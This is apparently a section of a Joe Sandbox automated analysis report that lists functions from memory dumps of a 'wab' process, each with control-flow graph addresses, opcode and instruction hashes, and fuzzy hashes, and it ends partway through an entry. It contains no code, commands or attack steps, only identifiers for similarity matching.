                                                          control_flow_graph 3730 2efe4c0-2efe4dd 3731 2efe4df-2efe4e2 3730->3731 3732 2efe4fb-2efe4fe 3731->3732 3733 2efe4e4-2efe4f0 3731->3733 3734 2efe50b-2efe50e 3732->3734 3735 2efe500-2efe50a 3732->3735 3739 2efe4f6 3733->3739 3740 2efe585-2efe5a3 call 2ef7bb4 3733->3740 3736 2efe521-2efe524 3734->3736 3737 2efe510 3734->3737 3741 2efe547-2efe54a 3736->3741 3742 2efe526-2efe542 3736->3742 3743 2efe51a-2efe51c 3737->3743 3739->3732 3752 2efe5a9-2efe5b2 3740->3752 3753 2efe790-2efe79a 3740->3753 3745 2efe54c-2efe56e call 2ef7b0c 3741->3745 3746 2efe573-2efe575 3741->3746 3742->3741 3743->3736 3745->3746 3747 2efe57c-2efe57f 3746->3747 3748 2efe577 3746->3748 3747->3731 3747->3740 3748->3747 3754 2efe79b-2efe7d7 3752->3754 3755 2efe5b8-2efe5d2 call 2ef7bc4 3752->3755 3763 2efe7d9-2efe7dc 3754->3763 3764 2efe77e-2efe78a 3755->3764 3765 2efe5d8-2efe5e1 3755->3765 3767 2efe7fe-2efe801 3763->3767 3768 2efe7de-2efe7f9 3763->3768 3764->3752 3764->3753 3765->3754 3766 2efe5e7-2efe612 3765->3766 3792 2efe76c-2efe778 3766->3792 3793 2efe618-2efe671 3766->3793 3769 2efe807-2efe81e 3767->3769 3770 2efe986-2efe989 3767->3770 3768->3767 3782 2efe825-2efe833 3769->3782 3783 2efe820-2efe823 3769->3783 3772 2efe98b-2efe9a5 3770->3772 3773 2efe9aa-2efe9ad 3770->3773 3772->3773 3775 2efe9cf-2efe9d1 3773->3775 3776 2efe9af-2efe9ca 3773->3776 3780 2efe9d8-2efe9db 3775->3780 3781 2efe9d3 3775->3781 3776->3775 3780->3763 3787 2efe9e1-2efe9eb 3780->3787 3781->3780 3786 2efe838-2efe856 3782->3786 3794 2efe835 3782->3794 3783->3786 3798 2efe858-2efe85b 3786->3798 3799 2efe860-2efe985 3786->3799 3792->3764 3792->3765 3813 2efe677-2efe67d 3793->3813 3814 2efe673-2efe675 3793->3814 3794->3786 3798->3787 3816 2efe683-2efe69e 3813->3816 3814->3816 3821 2efe6a4-2efe6aa 3816->3821 3822 2efe6a0-2efe6a2 3816->3822 3824 2efe6b0-2efe6be 3821->3824 3822->3824 3827 2efe6cc 3824->3827 3828 2efe6c0-2efe6ca 3824->3828 3830 2efe6d1-2efe6d3 3827->3830 3828->3830 3830->3792 3831 2efe6d9-2efe6db 3830->3831 3833 2efe6dd-2efe6e7 3831->3833 3834 2efe6e9 3831->3834 3835 2efe6ee-2efe6f0 3833->3835 3834->3835 3835->3792 3837 2efe6f2-2efe765 3835->3837 3837->3792
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7acf1310f030f07577febd2c58cb21d66f87331dcac71f03b5009eb4ca5282e6
                                                          • Instruction ID: 19af7ef1353cb1916b559517497decbec376cdbb14514e38cf1235a1be876984
                                                          • Opcode Fuzzy Hash: 7acf1310f030f07577febd2c58cb21d66f87331dcac71f03b5009eb4ca5282e6
                                                          • Instruction Fuzzy Hash: 07E18C30B002048FDB54DF78D4906AEB7F2AF88314F589569E606DB3A1EB75ED46CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFDFF0 Relevance: .4, Instructions: 366COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3856 2efdff0-2efe00d 3857 2efe00f-2efe012 3856->3857 3858 2efe014-2efe02d 3857->3858 3859 2efe032-2efe035 3857->3859 3858->3859 3860 2efe05d-2efe060 3859->3860 3861 2efe037-2efe050 3859->3861 3863 2efe077-2efe07a 3860->3863 3864 2efe062-2efe070 3860->3864 3876 2efe0bf-2efe0cb 3861->3876 3877 2efe052-2efe05c 3861->3877 3866 2efe07c-2efe086 3863->3866 3867 2efe087-2efe08a 3863->3867 3864->3861 3875 2efe072 3864->3875 3868 2efe0ad-2efe0af 3867->3868 3869 2efe08c-2efe0a8 3867->3869 3873 2efe0b6-2efe0b9 3868->3873 3874 2efe0b1 3868->3874 3869->3868 3873->3857 3873->3876 3874->3873 3875->3863 3879 2efe26b-2efe275 3876->3879 3880 2efe0d1-2efe0da 3876->3880 3882 2efe276-2efe2ae 3880->3882 3883 2efe0e0-2efe100 3880->3883 3886 2efe2b0-2efe2b3 3882->3886 3890 2efe259-2efe265 3883->3890 3891 2efe106-2efe10f 3883->3891 3887 2efe2d6-2efe2d9 3886->3887 3888 2efe2b5-2efe2d1 3886->3888 3892 2efe2df-2efe2ef call 2ef01b0 3887->3892 3893 2efe493-2efe495 3887->3893 3888->3887 3890->3879 3890->3880 3891->3882 3894 2efe115-2efe144 3891->3894 3899 2efe2f4-2efe2f6 3892->3899 3897 2efe49c-2efe49f 3893->3897 3898 2efe497 3893->3898 3913 2efe186-2efe19c 3894->3913 3914 2efe146-2efe17e 3894->3914 3897->3886 3900 2efe4a5-2efe4ae 3897->3900 3898->3897 3903 2efe30d-2efe337 call 2ef01b0 call 2ef7b5c 3899->3903 3904 2efe2f8-2efe2fb 3899->3904 3911 2efe33d-2efe346 3903->3911 3912 2efe488-2efe492 3903->3912 3904->3900 3915 2efe34c-2efe459 call 2ef01b0 call 2ef0208 * 3 3911->3915 3916 2efe461-2efe486 3911->3916 3919 2efe19e-2efe1b2 3913->3919 3920 2efe1ba-2efe1d0 3913->3920 3914->3913 3915->3911 3968 2efe45f 3915->3968 3916->3900 3916->3912 3919->3920 3929 2efe1ee-2efe201 3920->3929 3930 2efe1d2-2efe1e6 3920->3930 3937 2efe20f 3929->3937 3938 2efe203-2efe20d 3929->3938 3930->3929 3941 2efe214-2efe216 3937->3941 3938->3941 3942 2efe218-2efe21d 3941->3942 3943 2efe247-2efe253 3941->3943 3945 2efe21f-2efe229 3942->3945 3946 2efe22b 3942->3946 3943->3890 3943->3891 3947 2efe230-2efe232 3945->3947 3946->3947 3947->3943 3949 2efe234-2efe240 3947->3949 3949->3943 3968->3912
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8bfef54c2434157c9e706996192b34dfb1d4af070ff3d3f3bb0fea84c1ad6167
                                                          • Instruction ID: 3c5a1155da5fa4100591b33333b4835dce5444dce6c7f00d84b674d6991f822e
                                                          • Opcode Fuzzy Hash: 8bfef54c2434157c9e706996192b34dfb1d4af070ff3d3f3bb0fea84c1ad6167
                                                          • Instruction Fuzzy Hash: 70D17D30B002049FDB54EB68D484BADB7F3FB88314F549569EA09AB351DB35ED45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFDAD8 Relevance: .4, Instructions: 362COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b79f57fe9d1717a475b33a504fdeea6843d95d87959fdf5f81b941e6c744f037
                                                          • Instruction ID: 72399d2444672c7230da8c02905b3238b900b7ff50d9f1cf7686b324d4eac5b6
                                                          • Opcode Fuzzy Hash: b79f57fe9d1717a475b33a504fdeea6843d95d87959fdf5f81b941e6c744f037
                                                          • Instruction Fuzzy Hash: B8D1DF71B402058FDB50DF69D8847AEBBB2EB89314F20C56AE609EB391DB75D840CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFD75C Relevance: .3, Instructions: 302COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 68df994aad05828d3514a8c3b9f34860aefbdd9d3dff3aab729724c910f25158
                                                          • Instruction ID: e4263fb84aa0021ae9f66b0f057646b5b9bb3cc62e5a1c6849ec22e8eb0a584e
                                                          • Opcode Fuzzy Hash: 68df994aad05828d3514a8c3b9f34860aefbdd9d3dff3aab729724c910f25158
                                                          • Instruction Fuzzy Hash: 7AB18F34A002149FDB14EF79D888AADBBF2EF88314F148569E906EB361DB35DD41CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF41F1 Relevance: .3, Instructions: 284COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fc76b5ce524f7ef06d410e4715e3677b2af2d885311b074dfce797db38478980
                                                          • Instruction ID: d1cbc6479102fae910277b077029c3c956dc68ce724072603831f8552f83cce8
                                                          • Opcode Fuzzy Hash: fc76b5ce524f7ef06d410e4715e3677b2af2d885311b074dfce797db38478980
                                                          • Instruction Fuzzy Hash: 21B15CB0E40209CFDB50DFA8D8857DEBBF2AF88318F14D129DA14A7294EB749845CF81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF4ABD Relevance: .3, Instructions: 260COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3abbbfd9587b1efe0846ada6e50465c8c1caf3f793f53b657d20fcd63cfa3f33
                                                          • Instruction ID: a1461911ef34ec4151c9759123864508fa63ccf7cfcd2ea1d9c68663afaccdb5
                                                          • Opcode Fuzzy Hash: 3abbbfd9587b1efe0846ada6e50465c8c1caf3f793f53b657d20fcd63cfa3f33
                                                          • Instruction Fuzzy Hash: E3A19170E40209CFDB50CFA8D8857DEBBF1AF88318F14E129DA14EB294EB759845CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AFA558 Relevance: .3, Instructions: 257COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f2f6b4a88bfd31780165e756c4b9ced91ce8891d64dce0fce287243646f8c330
                                                          • Instruction ID: 6773865b3708b621baca854fa8cd4d1080b48301fe8e5c9847c45aa409ed79af
                                                          • Opcode Fuzzy Hash: f2f6b4a88bfd31780165e756c4b9ced91ce8891d64dce0fce287243646f8c330
                                                          • Instruction Fuzzy Hash: 73A14C30A01204DFCB14DB68D584B9DBBF2FF88318F548469E44AAB361DB76ED52CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF3EA5 Relevance: .2, Instructions: 237COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de2558cda06edd84d8ffd27831a555ae41a4af28d38933965db8e2c7c1246c35
                                                          • Instruction ID: 8c13a8743f1a8280724927acde13e20b2d2ed0672b954738bce56aa9e406778f
                                                          • Opcode Fuzzy Hash: de2558cda06edd84d8ffd27831a555ae41a4af28d38933965db8e2c7c1246c35
                                                          • Instruction Fuzzy Hash: E4916A70E40209CFDF50CFA9C9857DEBBF2AF88308F14D529E605AB294EB749845CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AFC998 Relevance: .2, Instructions: 231COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fc16a580facb47ff26dd817b6ffe98fa9964add9b28e35cd09c732a1d471928c
                                                          • Instruction ID: f9855989e1a5212f8eef0199e50ec7c47a499eaace4ed7a6f8cc150e03506e9d
                                                          • Opcode Fuzzy Hash: fc16a580facb47ff26dd817b6ffe98fa9964add9b28e35cd09c732a1d471928c
                                                          • Instruction Fuzzy Hash: 81915E30B002198BDB14DB69C8A0BAEB7F3FF89700F548569D509EB345EF75AD428B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF9628 Relevance: .2, Instructions: 229COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e46cedcee3274c51590718039196ac18e2324d140815839fdb6c1040ffebc552
                                                          • Instruction ID: 03b3bd254351d9ce50ddbeb65d9fbb12a2d6dbd28f56a1e453007c9f89ccc4d5
                                                          • Opcode Fuzzy Hash: e46cedcee3274c51590718039196ac18e2324d140815839fdb6c1040ffebc552
                                                          • Instruction Fuzzy Hash: E361D471F000118BDB119B7EC994A5EBAD7AFD8721F194039E80AEB325DEB6DD0287D1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF76E1 Relevance: .2, Instructions: 224COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 88e4a02ceeb1653e19e6f3f1639a48141404a499a6da0e1092bc355b5ae01a49
                                                          • Instruction ID: 116a10b972e6247efb9224b1b87f2cb492597f58216e256b6d510009e31dbb59
                                                          • Opcode Fuzzy Hash: 88e4a02ceeb1653e19e6f3f1639a48141404a499a6da0e1092bc355b5ae01a49
                                                          • Instruction Fuzzy Hash: CD814B30B012458FDB44DBA9C4A479EBBF2EB89300F208439E50AEB355EF359D428B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF7A00 Relevance: .2, Instructions: 219COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 21b007932c05d5e21138b687e69653cdd4ac9a8cb0c18253303259a8ae655678
                                                          • Instruction ID: 78a80a4f967bf1848053878df9e48c76c59a4ee5f91a39e0747132a8f9ddba2b
                                                          • Opcode Fuzzy Hash: 21b007932c05d5e21138b687e69653cdd4ac9a8cb0c18253303259a8ae655678
                                                          • Instruction Fuzzy Hash: 3D913F30E00659CBDB10DF68C890B9DB7B1FF89310F2085A9E549BB255DB71AE85CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF7A18 Relevance: .2, Instructions: 210COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 523c23c3609a80e4dc73e5dec4250c30bd831748fcdf1b6714bcc6bac369352d
                                                          • Instruction ID: 35d0eb30fee4f2c082c1709889ee740408dbffd64effcb8d7a21130463e4270c
                                                          • Opcode Fuzzy Hash: 523c23c3609a80e4dc73e5dec4250c30bd831748fcdf1b6714bcc6bac369352d
                                                          • Instruction Fuzzy Hash: 98911C70E00619CBDB20DF68C890B9DB7B1FF99310F2085A9E549BB255DB71AA85CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF7FB0 Relevance: .2, Instructions: 186COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9cd17ccaa432b91840f53f5ea4d3e48f7f36a2fb4553d978025c3f740a0ef8ab
                                                          • Instruction ID: e364c6888d55b88d87feab4d8cfb9d1643835877c1837bf8dbd34ea306054e70
                                                          • Opcode Fuzzy Hash: 9cd17ccaa432b91840f53f5ea4d3e48f7f36a2fb4553d978025c3f740a0ef8ab
                                                          • Instruction Fuzzy Hash: 85617070B00219DFEB149BB9C854B9EBAF6FF88300F248529E109EB395DF765D418B54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AFC98E Relevance: .2, Instructions: 166COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2335cb2bc64e8dbb77de224b001552467d517b49870250b29016efcf4feb806d
                                                          • Instruction ID: ac7770712e2b79e7ecca8af1ceb7799d42d93d304e7d40c80aa2221138c6f57a
                                                          • Opcode Fuzzy Hash: 2335cb2bc64e8dbb77de224b001552467d517b49870250b29016efcf4feb806d
                                                          • Instruction Fuzzy Hash: F7514030B012159BDB04DB79D8A0B6E77F3EB88700F548469D509EB355EF76AD018BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF8858 Relevance: .1, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db9e2505f6f6feff9766664427b0383c9d2cb3bf971b7a5d298da2b708016886
                                                          • Instruction ID: e35375ebeb06af8a59eda8d85ae17050aee3f1b96d658386e16c085916db5464
                                                          • Opcode Fuzzy Hash: db9e2505f6f6feff9766664427b0383c9d2cb3bf971b7a5d298da2b708016886
                                                          • Instruction Fuzzy Hash: 2D418172A01609DFDB20CEA9C8C0B9FF7B1FB99310F20493AE255D7251D732AA45CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF6D0D Relevance: .1, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7d1a02872ba589f823b113fbd1b597aad52c3ebf7e4c6fe107581b6fa70eabe8
                                                          • Instruction ID: 165660dc7d3d5a5d67824c44e7f09c46c32a055ea3fc8d8a347c049e02f50411
                                                          • Opcode Fuzzy Hash: 7d1a02872ba589f823b113fbd1b597aad52c3ebf7e4c6fe107581b6fa70eabe8
                                                          • Instruction Fuzzy Hash: C0512371D002188FEB18CFA9C884BDEBBB5BF49304F14952AE829BB350D774A944CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF7FA0 Relevance: .1, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2bd38b1c6de3bd27ab88deb718f1cee2f86c3202bbe320ae0fc0fe610fd1cf95
                                                          • Instruction ID: 03cae121f4d598b4e8b209f3b0f4d5307b421dfd24254a772a29c55a976cdf96
                                                          • Opcode Fuzzy Hash: 2bd38b1c6de3bd27ab88deb718f1cee2f86c3202bbe320ae0fc0fe610fd1cf95
                                                          • Instruction Fuzzy Hash: 35419E74B002089FEB159FF9C854B9EBBF6FF88300F208529E119AB395DB759C418B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF6D18 Relevance: .1, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 875d5ff19e2851533dab7c3502ce5f9e0b0aa06c2a8ffae08fec7c9d96db150b
                                                          • Instruction ID: c257cdc6eb2b1e72bb5f49f204ffdd1a8677036cac2cc6a3a20e671253eef306
                                                          • Opcode Fuzzy Hash: 875d5ff19e2851533dab7c3502ce5f9e0b0aa06c2a8ffae08fec7c9d96db150b
                                                          • Instruction Fuzzy Hash: B7513471D002188FEB58CFA9C884BDEBBB5BF49704F14851AE829BB350DB74A944CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFAAD4 Relevance: .1, Instructions: 126COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d7bee19b7448691c9b4aae866ad22e6ccf94e1250a81cfb0a116f9f461258739
                                                          • Instruction ID: 67f3cf4587e36b86ee97f8af4c8e06faa9b0d360dec409323f7e9746d29f639f
                                                          • Opcode Fuzzy Hash: d7bee19b7448691c9b4aae866ad22e6ccf94e1250a81cfb0a116f9f461258739
                                                          • Instruction Fuzzy Hash: 91519D70A802098FEB54DF75C458BED7BB2AF49309F149479D51AEF390DB788940CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF112B Relevance: .1, Instructions: 126COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 412241278aaa18c2f4dff13eed7171b91e4c0eab49aa7f01b027adf2f4efb823
                                                          • Instruction ID: 056ef6d5da4bdac73add05c6c1bf56d20afaee390969ecb5edf9f605ca9dcbeb
                                                          • Opcode Fuzzy Hash: 412241278aaa18c2f4dff13eed7171b91e4c0eab49aa7f01b027adf2f4efb823
                                                          • Instruction Fuzzy Hash: 1F517070E92346CFCB19DB68D8D19583BB3BF963003D44669D3044B3A2DAF86956CF81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF6F9F Relevance: .1, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2505767e8160b984c490fb4650ba9de944307aa400c265b34e14d49d898fe651
                                                          • Instruction ID: d058ec55176b381a445bbe49c3ab844b959b5b936b14f114746baf44d7782bfc
                                                          • Opcode Fuzzy Hash: 2505767e8160b984c490fb4650ba9de944307aa400c265b34e14d49d898fe651
                                                          • Instruction Fuzzy Hash: 18414834B50105CFDB54DF68C458AAD77B6AF4C304F609069E602EB7A0CB75DC40CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF1138 Relevance: .1, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b34b37a5f61f0a96e1c59aeca495638bca979ae402a45225be4926b58e8ac68d
                                                          • Instruction ID: 093ffc3412fa2f2d6dffe4d740566f1a7b29fa70b6aa60fd68553538d680e05a
                                                          • Opcode Fuzzy Hash: b34b37a5f61f0a96e1c59aeca495638bca979ae402a45225be4926b58e8ac68d
                                                          • Instruction Fuzzy Hash: 39515B70E92346CFCB19DB68D8D09583BB3BF963003D48669D3054B3A2DAF86956CF81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF5938 Relevance: .1, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 46b3ca26aeb0972fbc3dd3e07cfad5caed3b8ae5375f668bf88a467e107e9a9b
                                                          • Instruction ID: 75333a01c8edc53ee6c0b3c2dcb6a2c337c112be3b80df37262ca3c73522ea07
                                                          • Opcode Fuzzy Hash: 46b3ca26aeb0972fbc3dd3e07cfad5caed3b8ae5375f668bf88a467e107e9a9b
                                                          • Instruction Fuzzy Hash: 6531CF30B012158FDB18AB75D49876E7BE3BB89311F648978E406EB341DE36CD45CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFF428 Relevance: .1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 36afe7a0168629c0ebbd6105f157e52802566fc445eee1cc54520c4f34def9cb
                                                          • Instruction ID: 8176f902f1ae09451b5ecab33862bbc2f9b081addfdaa53c7ae76d1b09463c95
